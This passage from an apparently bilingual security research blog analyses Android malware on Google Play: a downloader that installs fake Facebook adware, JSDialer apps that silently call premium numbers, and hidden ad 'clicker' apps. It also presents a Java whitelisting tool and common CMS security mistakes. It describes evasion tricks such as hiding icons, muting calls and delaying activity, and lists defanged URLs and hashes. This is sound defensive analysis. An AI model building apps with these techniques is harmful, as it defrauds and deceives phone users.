entonces, el día después, se realiza otra comprobación. Dos de cada tres veces se visitará la URL mostrada en la imagen. Ahí un TXT apunta a otra app en Google Play, de forma que el atacante inunda con estos anuncios la pantalla. Pero la parte interesante ocurre cuando la app no entra en ese "if" y baja por el código. El método Gfveaqwfea comprueba la existencia de la app com.facebook. No es la app oficial de Facebook (es com.facebook.katana), sino el adware que será instalado posteriomente. Comprobando si existe com.facebook y si no, descarga la nueva app La app comprueba si el dispositivo está configurado para instalar apps de fuera de Google Play. Esto es muy común en ciertos países donde el uso del mercado es limitado. También es una configuración común en los dispositivos de usuarios que instalan apps "no oficiales", así que en estos escenarios tendrá bastante éxito. Si es así, se descarga a.apk desde la URL mostrada en la imagen y se almacena como xxx.apk. Comprueba la opción "instalar de fuera de Google Play". Si es posible, intenta descargar el nuevo apk El nuevo apk en la carpeta "Download" El usuario no verá nada y no se le hará ninguna pregunta para la descarga. Entonces se ejecuta. Dependiendo de la configuración del dispositivo, si el usuario ha asociado automáticamente la ejecución a Verificar Apps o Instalar Directamente, se mostrará un diálogo de selección... o no. Cuando esta segunda app está siendo instalada, esto es lo que verá el usuario: Parece una actualización legítima de Facebook Es importante recordar que esta es la imagen que aparecerá cuando el usuario desbloquee el teléfono, el día después de que fuera instalada la app original, y solo una de cada tres veces hasta que sea instalada... así que es bastante improbable que la víctima asocie la primera instalación del "cambiador de voz" por ejemplo, con esta "actualización" que parece legítima de Facebook. El icono es similar y el nombre lo hace aun más confuso. Esquema general del downloader Esta nueva app descargada podría ser, literalmente, cualquier cosa. En este caso se hace pasar por Facebook, y el icono desaparece un segundo después de ser instalada. Si el usuario tiene el Facebook real en su teléfono, pensará que se está autoactualizando, y probablemente no le otorgue mayor importancia. Pero la realidad es que se trata de un adware muy agresivo que será instalado por el usuario gracias a este truco de ingeniería social. El icono del falso Facebook desaparecerá Conclusiones Los atacantes están especializándose cada vez más en que las apps lleguen a Google Play, y transformarlas luego en adware/malware a largo plazo. Esta operación a largo plazo les proporcionará más víctimas y estamos detectando este patrón cada vez más en apps maliciosas. El truco de ejecutar la app solo cuando el teléfono se desbloquea, otorga mayor "credibilidad" para la víctima. Con Path5, hemos identificado a la persona detrás de estos ataques (un programador polaco). Ha estado operando desde finales de 2014. En estos momentos están activas unas 20 apps suyas en Google Play, de unas 100 que ha subido en las últimas semanas. La app que acabamos de analizar es us.free.voice.changer.funny.voices.lolapps, con el SHA1: c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61 Las que parecen ser del mismo programador, usando técnicas similares, y todavía están online son: TV remote controller, us.tv.remote.pilot.television.free.tool2, 88287f102bbd9cf3a3e5e7601b5bc8ee760d4525 Faster Wifi PRANK, us.phonehelper.wifi.booster.free, 74b2cc8d95c001832a4d4fb11ea3cb9638daf5e8 Visión nocturna gratis, us.night.vision.nightvision.free.useit, 1606ce1f616e3ba29ac021e4ce1ac1cb5e84b7a4 Funny voice changer, us.free.voice.changer.funny.voices.lolapps,c0eb7cde5a1b3818a1d7af2f580f8ea3fa1e8d61 Fake phone call, us.free.fake.call.caller.lolapps, 3b0a2b88effd264235e75984cea3bc77a6304e8b Fake connection, us.fake.call.caller.free.usapps, 2f3c8a8cd1e5ecdad0e348484c72f25aff45d755 Faster internet PRANK, us.phonehelper.internet.booster.free, c2b083d0ce9d13e8df2f680f2901cd54778d385e Increase battery life PRANK, us.phonehelper.battery.booster.free, 4890c7437268b65ef376515047c13e0eecffdd9a Funny voice changer, us.free.voice.changer.funny.voices.lolapps, a97c7f6669c41ead0ba54928ebe2cad5ba706bc5 Transparent phone HD, us.transparent.screen.diaphanous.phone.lolapps, 64e44c0d234f96eff5f0e44305d25b35242b0e51 Flash-Player installation, us.flashapps.free.flashplayer, 9f0c9145f2a265d476b936830fa9dde3d024eab6 Diáfano teléfono (gratis),us.transparent.screen.diaphanous.phone.free.smartools,c6c2617f7cf512669f553876939e5ca367c9e746 Increase volume sound PRANK, us.phonehelper.sound.booster.free, 3e360ee39146cbd834280c18d656e3e9f6d0df2f Termómetro electrónico gratis, us.digital.electronic.thermometer.free.measure.temperature.temp, 722f7f2c10c4b656ded858cf9f91a8c55ea226b6 Ski jumping 2015, us.ski.jumping.free.game.full.sportgames, 638a1c331e76bec73b1a46a451e4d1de6cd20879 FlashPlayer, us.flashapps.free.flashplayer2, 9f7aa1bc90770748681b08e3ee63dcb974195f7a Falsa llamada entrante, us.free.fake.call.caller.smartools, fb9c05094eb1fdcfa8aec07eeff1e95ee7814e76 Increase network signal PRANK,us.phonehelper.signal.booster.free,495b151c5e709bfa50c671c8fb93cbeaee29e025 Control remoto para la TV, us.tv.remote.pilot.television.free.tool, dbfd108973388d6c1a506ac68b79463df8271f5c Fake phone call, us.free.fake.call.caller.lolapps, e96d2ab7d8d0c7990be07bd42b9e9bc079e70f3a Tonos para Navidad, us.christmas.ringtones.free.carols.mp3.ringtonedownloader, fa57543faf60073f56041caee0f1524cfc9f77dd Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanuel.tirado@11paths.com
27 de febrero de 2015
JSDialers: apps calling premium rate numbers (with new techniques) in Google Play
During last year, a lot of "made in Spain" malware was found in Google Play. It was basically malware that tried to silently subscribe the victim to premium SMS numbers. From a while now, the problem has vanished, and it was hard to find this kind of apps, at least in Google Play. In Eleven Paths we have found seven apps during these last weeks that use new techniques based in JavaScript, more dynamic and smart. They managed to upload fraudulent apps to Google Play. We have called them JSDialers. Let's see how they work. With Google Play more vigilant about SMS premium apps in their market, the attackers have tried some other techniques that avoids Java and focus in JavaScript received from the servers. Besides, they do not only subscribe to SMS premium services, but they make phone calls to premium rate numbers. Everything in a very smart way, because, for example, they try to mute the telephone and microphone during the phone calls, tries to hide the phone call itself from the screen... and take the whole code from the servers instead of embedding it. What the user perceives When the user downloads and installs any of these apps, something like this will be shown. First views of the apps These are the typical "terms and conditions" that probably nobody will read. Accepting them implies making the phone call in an automatic and transparent way for the user. The image "Aceptar" image shown, is taken from this jpg file: hxxp://www.contentmobileapps.com/called/images/continuar_call_100.jpg Whatever the user responds about the age, the device will show an animation (a GIF taken from here hxxp://www.contentmobileapps.com/called/images/loading.gif) while the actual phone call is done to a premium rate number. GIF shown to the user while the phone call is done It seems that, depending on the phone, a green bar may appear during a few seconds, but the developer tries to hide it. The device making the call may be detected in the background The attacker mutes the telephone and microphone so the user is unable to hear the message of the phone calling and the locution. On the last line one can observe the attempt to mute the microphone and device volume The victim will be subscribed to this service and will have to face the costs of premium rate calls. The user will now be able to browser the recipes, but the phone call has already been made. The app is just some links to a web, but the phone call has been made Once clicking on the "Help" button, the option to unsubscribe is given. The app offers instructions on how to cancel the subscription What happens and how does it work? These apps depend strongly on the servers and work via Cordova plugin. It is a set of device APIs that allow a developer to access device functions via JavaScript... The permissions of the analyzed app are these, although they are not the same in all of them. Some of them lack of the SMS permissions. Permissions in one of the apps. Some of them lack SMS permissions The first thing the app does is executing a WebView with Cordova that shows an internal HTML. The obfuscated domain starts the real communication with the server A request like this is done: hxxp://highmas.com/alcalinas/home.php?movil=ffffffff-XXXX-ffff-ffffd6de17fd&version=16&modelo=GT-XXXX%20(goldenxx). The user will receive a welcome screen and will be asked for his/her age. Whatever is clicked, the app will go to the same function that gathers some information with a form. The value in CAPTCHA field is useless. It seems to belong to some discarded proofs. Form sent to the server A web redirect after the request, takes the user to a webpage where the country and carrier is checked. The app checks the country and carrier via JavaScript Once everything is checked, terms and conditions are shown. When accepted, the app calls"term_acept.asp", which finally returns dynamically the premium rate number to be called. The premium rate number is returned. The app will make an unnoticed phone call With Cordova's help and a dialler plugin, it finally makes an actual phone call. Some other interesting info and more apps The developers have found a way to get back to fraudulent activity with premium rate phone calls. Who is behind these apps? The domains being used and terms and conditions are very clear. We are investigating the developers and some other apps they have, and will try to offer a report soon. With Path5, we could find similar apps. Some of them have already been removed, but not all of them. They are working on uploading fraudulent apps since early January. Some examples of found apps Some apps have mutated from apps related with cars (in Japanese), to porn. This is the preferred way to hide better in Google Play. App that changed at some point These are the applications, package names and hashes. Only one of these apps has been analyzed in Virustotal, and it was not detected by any engine so far. Videos hd peliculas porno sexo, com.gepekline, 6f1c3a596920298873f1e38842f751991875e6d6 Peliculas videos sexo Porno hd,com.wheelpvies,34b2bba921e9b7d9c8242d31e2cc011908684d9a Videos hd peliculas porno sexo ,com.spportss,ada71fc53f9aae5f84cc69814b58f65f1e273067 Canciones infantiles y videos, com.sursongsonline, 1fcce1b8effdcbdef54cc02675eefc5214fec67b Peliculas videos porno sexo hd,com.escarsysview, 031490dd0b824c02be7d0fe728d67f998ef7c914 Cine estrenos peliculas online, com.filmsmeka, e856cd2d4a366abbb1df18c8bc53c7a35a6da535 Un millón de recetas de cocina, com.recippes, 194362c46b124161a5289d1d3c4c56f93b142044 With our database, we have been able to locate some other apps, and prove that the developers behind them come from Valencia and have been working on these frauds for a few months now. Fraudulent JSDialers in our data base The whole document is available here: JSDialer, premium dialers scams in Google Play from ElevenPaths Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanual.tirado@11paths.com Miguel Ángel García miguelangel.garcia@11paths.com
20 de febrero de 2015
JSDialers: apps que llaman a números premium (con nuevas técnicas) en Google Play
Durante el año pasado se descubrió en Google Play bastante malware "made in Spain" que intentaba suscribir de forma automática a servicios SMS premium. Desde hace algún tiempo, el problema ha remitido, y es difícil encontrar especímenes de ese tipo al menos en Google Play. En Eleven Paths hemos encontrado siete aplicaciones durante estas últimas semanas, que usan nuevas técnicas basadas en JavaScript más dinámicas e ingeniosas y así han conseguido subir a Google Play apps fraudulentas. Los hemos llamado JSDialers. Veamos cómo. Agotado el filón de los SMS premium en Google Play, los atacantes han optado por otra técnica que elude en lo posible el código en Java y se centra en JavaScript recibido de los servidores. Además, también prescinden algo de las suscripciones SMS y en su lugar realizan llamadas a números de tarificación especial. Todo de forma muy inteligente, puesto que silencia el teléfono mientras hace la llamada, intenta ocultar la pantalla y además, toma todo el código de forma dinámica. Lo que percibe el usuario El usuario bajará una de estas aplicaciones, y verá algo así. La secuencia de imágenes es la siguiente. Primeras pantallas que recibe el usuario Las típicas "condiciones de servicio" y pregunta por mayoría de edad, que probablemente nadie lea. Aceptarlas implica realizar la llamada de forma totalmente automática y transparente para el usuario. De hecho, la imagen de "Aceptar" que se muestra está tomada de este enlace: hxxp://www.contentmobileapps.com/called/images/continuar_call_100.jpg Lo interesante es que respondiendo cualquier opción, el teléfono mostrará una animación (un GIF descargado desde aquí hxxp://www.contentmobileapps.com/called/images/loading.gif) mientras en realidad se realiza una llamada a un teléfono de tarificación especial. Gif que se muestra al usuario mientras se realiza la llamada. Parece que según el teléfono, aparecerán durante muy pocos segundos la barra de llamada pero el programador intenta ocultarla por todos los medios. A veces, se observa que se está realizando una llamada entre bambalinas El atacante silencia el micrófono y altavoz para que el usuario no perciba el mensaje que la llamada se está realizando y la locución. En la última línea se observa el intento de silenciar micrófono y volumen del auricular La víctima quedará suscrita a este servicio y tendrá que asumir los costes especiales de la llamada. El usuario pasa a consultar las recetas, pero la llamada ya ha sido realizada. La app son una serie de enlaces a una web, pero realmente ha realizado la llamada También es cierto que en la parte de "ayuda" de la aplicación, se ofrece la opción de cancelar la suscripción. La app ofrece instrucciones para cancelar la suscripción ¿Qué ocurre y cómo funciona? Estas apps dependen fuertemente del servidor y funciona a través de Cordova. Se trata de una librería que permite acceder a funciones del teléfono a través de JavaScript. Los permisos de la app estudiada son estos, aunque no coinciden en todas. Algunas no disponen de permisos SMS. Permisos de una de las apps. Algunas no tienen permisos de envío SMS Lo primero que hace la app es ejecutar un WebView con Cordova, que llama a un html interno. El dominio ofuscado comienza la comunicación real con el servidor Esto realiza una petición del tipo hxxp://highmas.com/alcalinas/home.php?movil=ffffffff-XXXX-ffff-ffffd6de17fd&version=16&modelo=GT-XXXX%20(goldenxx), y el usuario recibirá la pantalla de bienvenida y se le pregunta por la edad. Pulse lo que pulse el usuario, irá a la misma función, que recopila cierta información a través de un formulario. El valor del Captcha es irrelevante, y parece que se trata de algo que se pensó, pero no se llegó a implementar. Formulario que envía al servidor con información Un redirect tras la petición, lleva al usuario a una página de comprobación del operador y el país. La app comprueba a través de JavaScript el operador y el país Una vez comprobado todo, muestra las condiciones de servicio. Aceptadas las condiciones, llama a "term_acept.asp", que por fin devuelve dinámicamente el número al que se debe llamar. Aquí devuelve ya el número de tarificación especial al que va a llamar de forma automática Con ayuda de la ejecución de Cordova y un plugin de llamadas, consigue su objetivo: Otros datos de interés y más apps Los creadores han encontrado así una forma de volver a la actividad fraudulenta con las llamadas a números de tarificación especial. ¿Quiénes están detrás de estas apps? Los dominios y la letra pequeña lo dejan claro. Estamos realizando una investigación más profunda sobre los autores y las aplicaciones que intentaremos ofrecer más adelante. Con Path5 hemos podido encontrar otras aplicaciones similares. Algunas han sido retiradas pero no todas aún. Operan desde principios de enero. Algunos ejemplos de las apps encontradas Algunas han mutado desde apps de coches (en japonés), a supuestas apps pornográficas. Una vez más, es la fórmula para pasar un poco más desapercibido en Google Play. App que mutó en algún momento Estas son las aplicaciones, el nombre de paquete y hashes estudiados. Solo una app ha sido analizada en Virustotal, y no es detectada por ningún motor antivirus por ahora. Videos hd peliculas porno sexo, com.gepekline, 6f1c3a596920298873f1e38842f751991875e6d6 Peliculas videos sexo Porno hd,com.wheelpvies,34b2bba921e9b7d9c8242d31e2cc011908684d9a Videos hd peliculas porno sexo ,com.spportss,ada71fc53f9aae5f84cc69814b58f65f1e273067 Canciones infantiles y videos, com.sursongsonline, 1fcce1b8effdcbdef54cc02675eefc5214fec67b Peliculas videos porno sexo hd,com.escarsysview, 031490dd0b824c02be7d0fe728d67f998ef7c914 Cine estrenos peliculas online, com.filmsmeka, e856cd2d4a366abbb1df18c8bc53c7a35a6da535 Un millón de recetas de cocina, com.recippes, 194362c46b124161a5289d1d3c4c56f93b142044 Con nuestra base de datos, hemos comprobado que parece que se trata de un equipo que opera desde Valencia desde hace algunos meses. Apps de estos desarrolladores en nuestra base de datos El documento está disponible aquí: JSDialer, premium dialers scams in Google Play from ElevenPaths Sergio de los Santos ssantos@11paths.com @ssantosv Juan Manuel Tirado juanmanual.tirado@11paths.com Miguel Ángel García miguelangel.garcia@11paths.com
17 de febrero de 2015
Nueva herramienta: JavaRuleSetter para crear Deployment Rule Sets
Oracle introdujo la noción de lista blanca en Java 7u40. Se llamó Deployment Rule Set. En Java7u51, se introdujo otra nueva funcionalidad, que estaba también cerca de las listas blancas, pero era muy diferente. Se llamó Lista de sitios de Excepción. En esta entrada, vamos a diferenciar entre ambas y presentaremos una nueva herramienta que hemos desarrollado que podría ser visto como una especie de cortafuegos para Java. Se llama JavaRuleSetter. Deployment Rule Set Al principio solo existían las Deployment Rule Set para intentar crear listas blancas o negras de la ejecución de applets de Java. Estaba destinado a administradores que deseasen bloquear RIAs (applets de Java y Java Web Start Applications, conocidos en conjunto como Rich Internet Applications) por dominios, certificados o nombre. Esto suponía un avance pero era terriblemente complejo de implementar. Los pasos que había que seguir eran: Crear un ruleset en xml. Es necesario conocer la sintaxis. Por ejemplo: <rule> <id location="http://*.java.com" /> <action permission="run" version="SECURE-1.7" /> </rule> <rule> <id /> <action permission="block"> <message>Bloqueado por las reglas del sistema</message> </action> </rule> </ruleset> Compilarlo con Java (se necesita disponer del JDK). Firmarlo con un certificado de confianza propio. Si no se tiene, hay que crearlo. Copiarlo a un punto concreto del sistema. El resultado es que, a la hora de visitar una web con un applet, se aplica este árbol de decisión para ejecutarlo o no. La regla podría bloquearlo por completo, o permitirlo solo si estaba bien firmado digitalmente. El applet se ejecuta sin hacer preguntas. Si la regla está definida a "default", se toma el camino que determinará la lista de excepción de sitios. Cuando el navegador detecta un RIA (applet o JWSA) primero pasa por este árbol de decisión para los Deployment Rule Sets Esto resultaba bastante complejo para un administrador, y casi imposible para un usuario estándar, así que Java reacción creando la lista de excepción o Exception Site List. Pero aun así, las Rule Sets siguen pudiendo ser perfectamente usadas por usuarios y no solo por administradores. Esa es la razón por la que se ha creado esta herramienta, simplificamos la creación de reglas para usuarios avanzados, y abstraemos al usuario de todo el proceso de crear certificados, firmarlos, etc. Exception Site List Este sistema se introdujo en enero de 2014 (solo unos meses después de las Deployment rules), orientado a los usuarios. No requiere tener privilegios de administrador y todo se hace desde la interfaz de Java. Es en realidad una segunda forma de crear listas blancas, pero no tan poderosa como las Rule Sets. Se puede concebir como una segunda línea de defensa para el usuario medio. En resumen, las Exception Lists afecta solo a las "preguntas" que hace Java antes de ejecutarse. Nunca las hará desaparecer, pero tampoco los bloqueará, incluso si la seguridad está establecida a "alta". Las listas de excepción no tienen efecto si la seguridad está establecida a "media" (cosa que ya no existe en la rama 8, en la que solo han dejado "Alta" y "Muy alta". Este diagrama lo muestra de forma más clara: Flujo de decisión de las listas de excepción Para crear una lista de excepción, simplemente se debe ejecutar javaclp.exe y añadir un dominio. Configurar listas de excepción en Java 7. Difiere un poco el diseño en Java 8 El fichero que controla la lista de excepción se almacena en la zona de usuario situada en C:UsersusernameAppDataLocalLowSunJavaDeploymentsecurityexception.sites en Windows. Rule Sets vs. Exception Site Lists Las principales diferencias se reflejan aquí: Comparación entre las listas de excepción y las Deployment Rule Set Rule Sets permite crear una regla y distribuirla por diferentes sistemas. Se impone siempre a las listas de excepción si existiera algún conflicto y pueden ser modificadas solo por el administrador, no por el usuario. Algo importante es que las Rule Set funcionan en un entorno de decisión muy temprano, antes de decidir si se ejecuta o no. De esta forma, si algún día los niveles de seguridad son vulnerados, las listas de excepción podrían ser eludidas, pero no las Rule Sets. El cuadro completo Java es complicado en estos momentos. Este es el árbol de decisión cuando se ejecuta un applet (o RIA en general). Esta es la mejor forma de entender cómo se ha mejorado la seguridad en dos años. El flujo completo de decisión depende de la versión de JRE, Deployment Rules, listas de excepción etc. Deployment rules funcionan en el segundo nivel comenzando desde arriba, y las Exception lists están en el quinto nivel. Java, todo el árbol de decisión sobre RIAs La herramienta Esta herramienta está destinada a usuarios o administradores a los que le preocupe la seguridad de Java (que deberían ser todos) y tienen que trabajar con applets (no pueden simplemente deshabilitarlo en el navegador). Si no se tiene ni idea de lo que se está haciendo, lo más sencillo es crear una regla para un dominio que se quiera meter en la lista blanca y pulsar en "Apply changes". El programa creará todos los valores por defecto y los aplicará. Los usuarios más avanzados podrían utilizar su keystore habitual para firmar el fichero con las Deployment Rules y eludir ciertas partes del proceso que prefieran controlar personalmente. En "Avanced Mode"" se encuentra toda la información al respecto. Bloquearlo todo impedirá que se ejecute cualquier applet de forma bastante temprana Java bloqueando la ejecución de un applet en el navegador Añadiendo un dominio para que sea permitida su ejecución Para mayor granularidad, se puede usar el modo avanzado Una forma muy básica de usarla es añadir una regla del dominio que se quiera tener en la lista blanca (se soportan wildcards). Pulsar sobre "Block everything else" y aplicar cambios. Se necesitará elevar privilegios dos veces: una para añadir un certificado (solo la primera vez) y otra para copiar el fichero con las reglas firmadas a system32 en el caso de Windows. La herramienta funciona en GNU/Linux y Mac OS X, aunque en estas plataformas no ha sido totalmente comprobada. Hemos creado dos versiones para Java 8 y 7. Esta herramienta está en versión alpha, por lo que podría contener algún fallo. Por favor, reportadlos e intentaremos solucionarlo. Para conocer cómo funciona por dentro el sistema de reglas de Java y aprovechar completamente la herramienta, recomendamos la lectura de esta documentación oficial: http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/security/deployment_rules.html JavaRuleSetter puede ser descargada desde aquí. Sergio de los Santos ssantos@11paths.com @ssantosv
16 de febrero de 2015
New Tool: JavaRuleSetter for creating Devployment Rule Sets in Java
Oracle introduced the notion of whitelisting in Java 7 update 40. It was called Deployment Rule Set. In Java update 51, it introduced a new feature, that was close to whitelisting as well, but very different. It was called Exception Site List. In this post, we are going to make clear the differences and introduce a new tool we have just developed, that may be seen like some kind of Java firewall. It is called JavaRuleSetter. Deployment Rule Set In the beginning, there was just the Deployment Rule Set to try to create white and black lists of Java applets executions. It was basically meant for administrators to block RIAs (Java applets and Java Web Start Applications, known collectively as Rich Internet Applications) by domain, certificates or name. This was great but quite difficult to implement. The steps to get this rule sets,were: Create a ruleset in xml. You have to know the syntax... for example: <rule> <id location="http://*.java.com" /> <action permission="run" version="SECURE-1.7" /> </rule> <rule> <id /> <action permission="block"> <message>Bloqueado por las reglas del sistema</message> </action> </rule> </ruleset> Compile it with Java (you would need the JDK). Sign it with a trusted certificate of your own. If you do not have one,you have to create it Copy it to a standard place in the system. The result was that, when visiting a web page with an applet, this is the decision tree Java follows to run it or not. The rule may block it completely, or allow but only if digitally signed properly. The applet is run without prompts. If set to "default", it goes to the exception lists decision tree. When browser detects a RIA (applet or JWSA) it first goes through this decision system for Deployment Rule Sets That was really hard for an administrator and even impossible to achieve for a standard user, so Java reacted creating the Exception Site List. But Rule Sets may very well be used by single users, not only administrators. This is one of the reasons we have just created this tool. To simplify creation of rules for advanced users, and, for creating the whole system for less savvy users (create a certificate, sign it, etc). Exception Site List This was created in January 2014 (just months after Deployment rules) for users. It does not require administrative privileges and it is all done via Java interface. It may be seen as a second way to whitelist, but not as powerful as Rule Sets, and as a first layer of defense for a single user. In a nutshell, Exception Lists affect prompts. It will never make them disappear, but will never make an applet be blocked either, even if security is set to "high". Exception Lists makes no difference if security level is set to medium. This diagram shows it: Exception List flow For creating an Exception List, just run javaclp.exe and add a domain. It will work one way or another depending on the Java security configuration. How Exception Lists are condivd in Java 7. I may differ a bit in Java 8 The file controlling the Exception Site List is stored in the user’s deployment location C:UsersusernameAppDataLocalLowSunJavaDeploymentsecurityexception.sites in Windows. Rule Sets VS Exception Site Lists So the main differences are: Comparison between Exception Site List and Deployment Rule Set Rule Sets allows to create a rule set and distribute to several computers. It wins over Exception Site Lists in case of conflict, and may be modified just by an administrator (not by the user). Another interesting thing is that Rule Sets works on a very early stage. If some day, security levels are defeated, exception site lists would be bypassed, but not the rule sets. The whole picture Java is complicated right now. This is the decision flow when executing and applet (or RIA, in general). This is the best way to understand how security has improved in just two years. The complete flow of Java applets executing or not depending on JRE version, Deployment Rules, Exception Lists, etc, is this. Deployment rules work on the second level from start, and Exception lists work on the fifth level. Java, the whole decision picture about RIAs The tool Java Rule Setter is intended for users that are really worried about Java security (they all should) and have to work with it (if you don't, just uninstall it from the browser). If you have no idea of what you are doing, just add a domain you need Java to run and click on "Apply changes". The program will create default settings and apply them. If you are a savvy user, you can use your usual keystore and sign the Deployment Rule file, and skip the whole process. Click on "Advanced mode" for more information. Blocking everything will avoid the execution of any applet in a very early stage Browser blocking rules because of the program Adding a new domain to be whitelisted Domain added to be allowed domains For more granularity, the advanced mode may be used There is very basic way to use it. Just run it and add a rule with a domain you want to have in your whitelist (wildcards supported). Click on "Block everything else" and apply changes. You will need to elevate privileges twice: one for adding a cert (only the first time) and one for copying the Rule Set file to system32. The tool works in GNU/Linux and Mac OS X, although it has not been fully tested in those platforms. We have created two versions, for Java 8 and Java 7. This tool is in alpha version, so it may contain some bugs. Please report so we can fix them. To deeply get to know the Deployment Rule Set system and take full advantage of the tool, we recommend reading this official documentation: http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/security/deployment_rules.html More information and instructions are available here. Sergio de los Santos ssantos@11paths.com @ssantosv
16 de febrero de 2015
Errores comunes en los CMS
CMS (Content Management Systems o sistemas de gestión de contenidos) son herramientas, generalmente web, que permiten que usuarios puedan crear, modificar y publicar contenido desde una interfaz. Suelen centrarse en la usabilidad y ser por tanto muy intuitivas para que cualquier perfil de usuario pueda crear el contenido. Como de costumbre, la facilidad de uso está reñida con la seguridad en muchos aspectos. Veamos algunos errores comunes que se suelen cometer a la hora de gestionar CMS populares. Existen cientos de sistemas CMS, entre ellos varios muy populares como Wordpress, Drupal, Joomla, PhpBB.... Aunque la estructura varía de uno a otro, la idea fundamental es disponer de un sistema de gestión del contenido (sea cual sea) almacenado y que el acceso se consiga mediante una interfaz sin (por lo general) tener que acceder al código/base de datos en los que se almacena todo. En resumen, facilitar esa interacción para que la gestión del contenido (multimedia, texto, etc) sea totalmente transparente. La idea es que esta interfaz cumpla la función de puerta de entrada a la edición del contenido y, por tanto, sea similar entre roles: ya se trate de un administrador o un editor el que acceda a ella. Esquema básico de cualquier CMS En el diagrama se puede ver esta sutil pero crucial diferencia: la irrupción de un componente intermedio, hace que el precio a pagar por esta conveniencia sea un incremento en el número de puntos de acceso potencialmente vulnerables al sistema. Fallos comunes Los CMS no se usan solo en entornos pequeños o están destinados a usuarios. Se encuentran muy extendidos y suelen usarse por una gran cantidad de páginas web e infraestructuras muy conocidas (Ebay, Flikr, Samsung o Yahoo entre otras). Las vulnerabilidades relacionadas con sistema CMS podrían ser categorizadas de la siguiente forma: Búsqueda de versiones antiguas: Aunque a veces resulte tedioso, es muy importante tener los últimos parches de seguridad de las aplicaciones. Es mucho más probable que una versión antigua contenga vulnerabilidades descubiertas y públicas. Copias de seguridad: Hacer copias de seguridad periódicamente es necesario, pero se convierte en una trampa cuando algunos plugins de CMSs guardan estas copias en directorios públicos y en ocasiones predecibles. Los atacantes los conocen y podrían hacerse con ellas. Copias de archivos de configuración: Es también muy común el duplicar un archivo de configuración a modo de copia de seguridad (como por ejemplo wp-config.php a wp-config.bak) mientras se modifican parámetros en el archivo principal. Si estas copias no se eliminan y permiten la lectura por un posible atacante, exponen cadenas de conexión, contraseñas y otra información crítica. Plugins inseguros: La mayoría de los CMS utilizan plugins o extensiones para mejorar su funcionalidad o añadir alguna nueva (el ejemplo por excelencia es Wordpress, con más de 35000 plugins). También son populares los temas o reskins que contienen estas extensiones, muchas veces no listadas. Los plugins pueden no ser oficiales y estar creados por aficionados con más buena voluntad que habilidades en programación. Por tanto no es complicado encontrar en ellos vulnerabilidades comunes como XSS, LFI, RFI o SQLi. Estas vulnerabilidades suelen ser el vector más habitual de entrada al contenido del CMS. Paneles públicos: En la mayoría de los casos, la interfaz desde la que se gestiona el contenido del CMS se mantiene pública y protegida simplemente por la combinación de un usuario y contraseña. Llegar a conocer la contraseña de un usuario o administrador puede no resultar tan complejo (ya sea por deducción, ataques de ingeniería social o compromiso de otra cuenta que le pertenece y con la que comparte credenciales). No es mala idea en estos casos complementar con un segundo factor de autenticación, reducir la exposición con Latch y los muchos plugins con los que contamos (por ejemplo Joomla, Wordpress o Drupal entre otros) para añadir una capa extra de seguridad a la interfaz... y además restringir el acceso a la página de entrada a direcciones locales del lugar de trabajo, por ejemplo. Por supuesto, nuestra herramienta de pentesting persistente Faast, busca la versión del CMS e informa al usuario no solo de que debe actualizar, sino de las vulnerabilidades que están expuestas por usar esa versión en concreto. También está preparado para encontrar las copias de seguridad que puedan estar alojadas y accesibles, los archivos de backup olvidados y los plugins o extensiones vulnerables. Además, el análisis se complementa con la búsqueda de otros fallos compartidos con cualquier sistema web, como PHP code injections, shell uploads, etc. Juan Luis Sanz juanluis.sanz@11paths.com
6 de febrero de 2015
Detected some "clickers" in Google Play simulating apps and games
During the last days, some apps have appeared in Google Play that work like "clickers", between them an app simulating Talking Tom (that was online for just a few hours) and a "Cut the Rope". In this case they visit ads and porn websites and simulate clicking in the banners, so they get some benefit. This is a known schema that affects the data plan of the user, because the apps will keep on requesting pages in the background and the victim will not be aware. ElevenPaths has detected in an early way the apps in the market, that work in an interesting way and that seems to be created by someone in Turkey. Since December, a developer has been uploading apps to Google Play, with the only intention of booting with the device and make GET requests in the background. Promising different kind of apps (from remote controls and X video searchers to flight simulators and games) these apps sum up to 50.000 downloads between all of the 32 apps we have spotted. Obviously not all the downloads translate into an infection (VerifyApps and other factor may affect) but they seem to be quite popular. Some of the apps are just "clickers" under different "disguises"to attract victims One of the apps is a scientific calculator with the description text in Italian. We have asked Google to remove the application that was still online (maybe because it was a little more advanced than the others and passed unnoticed) and that we have located thanks to Path5. App that wasn't removed from Google Play. One of the latest remaining. It worked in a more sophisticated way than the others. What the app does When it starts, it always shows a dialog with the text "Application is not compatible" in Italian, Turkish and Spanish, between other languages. The app always shows the same dialog when it starts It hides its icon, modifiying values in the Manifest, after the first time it runs and after showing the message. It does nothing else until it receives a change in WiFi, data connection or a reboot. It connects to this encoded URL (it is not base64, although it looks like it). Encoded URL Decoded, it turns out to be: hxxp://1.oin.systems/check.php. If it responds with a "True" (which is pretty much always by now), its activity will start. Other variants connect to other URLs like this one: Or this, depending on the sample: hxxp://pop.oin.systems/commands.php. Every time a new request is made, the apps get instructions on where to go and click. In every connection they get new domains to connect to. Request for the place it has to visit In just a few minutes, the device has generated dozens of requests. For the user standpoint, the problem will be the data consumption if he has a paying data plan. Apps are activated when the device boots so, although the app itself is not active or launched, the device will be consuming data all the time. Extract of the traffic generated by the device during a few minutes. Most of them are porn sites Indiscriminate visits will be done through a service that builds a WindowManager with a weight and height of "-2" so the user is not able to actually see it in the screen, where a WebView is added. There is where the URLs are loaded. It will take some other values from some other URL. Every 15 seconds (time to load the web) it will call: Another task will take care of executing this JavaScript over the loaded URLs. This will result in random clicks on the web. This strategy of hiding the icon, avoids the user to even bothering in uninstalling an app, because he will think it was never installed in the first place. Moreover, if it keeps quiet until next reboot or when connectivity changes, there are more chances of the user forgetting about it. Permissions are not very blatant. Permissions of these apps Detection The app was not deteced by any engine during December and January. January 20th we sent it (for the first time) to VirusTotal from ElevenPaths' lab. Detection in January Eventually in February, some engines started detecting it. Engines have created a specific signature for this family, called Riskware.Clicker. Detection in February The attacker This is a typical schema, but quite witty in its implementation. We have detected that the attacker has been acting since later December and that he probably is Turkish ( thanks to the information obtained from its ad-hoc certificate). Its current timezone is GMT+2, added to the language used in some apps, makes us think that it's someone developing from Turkey, although with some Italian relationship. Some other specific characteristics has allowed us to spot the other apps very quickly. The strategy has been the usual one. During most of the time, the app starts in Google Play like an anodyne app. It consolidates in the market and maybe someone downloads it. For the next version, the apps mutate into something more 